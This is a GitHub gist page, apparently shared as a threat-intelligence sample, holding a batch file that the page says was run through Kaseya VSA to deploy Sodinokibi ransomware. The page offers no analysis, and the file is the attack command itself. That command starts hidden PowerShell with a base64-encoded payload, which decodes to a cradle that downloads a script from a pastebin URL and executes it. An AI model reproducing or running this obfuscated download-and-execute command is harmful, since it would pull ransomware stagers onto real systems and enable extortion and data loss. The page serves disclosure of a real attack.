Skip to content

Instantly share code, notes, and snippets.

@KyleHanslovan

KyleHanslovan/1488.bat Secret

Last active July 26, 2019 19:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KyleHanslovan/d48351d7d9a6eba6c9d24fd8f30eaeb3 to your computer and use it in GitHub Desktop.
Save KyleHanslovan/d48351d7d9a6eba6c9d24fd8f30eaeb3 to your computer and use it in GitHub Desktop.
Download ZIP
Batch files executed via Kaseya VSA to deploy Sodinokibi ransomware.
Raw
1488.bat
cmd.exe /c START C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBOAHAARQA4AEQAagBlADkAJwApACkAOwBJAG4AdgBvAGsAZQAtAFAARgBCAFUATQBGAE0ARgBIADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACIAfQBlAGwAcwBlAHsAIABJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAE4AcABFADgARABqAGUAOQAnACkAKQA7AEkAbgB2AG8AawBlAC0AUABGAEIAVQBNAEYATQBGAEgAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIAB9AA==
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment